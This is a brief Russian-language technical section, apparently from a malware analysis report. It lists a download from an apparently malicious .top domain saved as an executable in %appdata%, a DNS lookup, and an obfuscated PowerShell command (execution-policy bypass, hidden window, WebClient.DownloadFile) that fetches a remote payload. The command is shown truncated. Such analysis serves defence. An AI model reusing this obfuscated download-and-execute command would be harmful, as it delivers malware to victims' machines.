Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWErSH^E^lL.exE ^-exEc^uTI^O^N^Po^lICY BYPaS^s ^-nOprO^FiLE ^-W^In^D^owSTylE ^h^I^dD^e^N ^(^nEw-^ObJecT sySteM.^N^e^T.W^e^b^C^l^I^eN^t).dO^WN^loaD^f^I^Le('http://roggistazli...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /C "POWErSH^E^lL.exE ^-exEc^uTI^O^N^Po^lICY BYPaS^s ^-nOprO^FiLE ^-W^In^D^owSTylE ^h^I^dD^e^N ^(^nEw-^ObJecT sySteM.^N^e^T.W^e^b^C^l^I^eN^t).dO^WN^loaD^f^I^Le('http://roggistazli...' (со скрытым окном)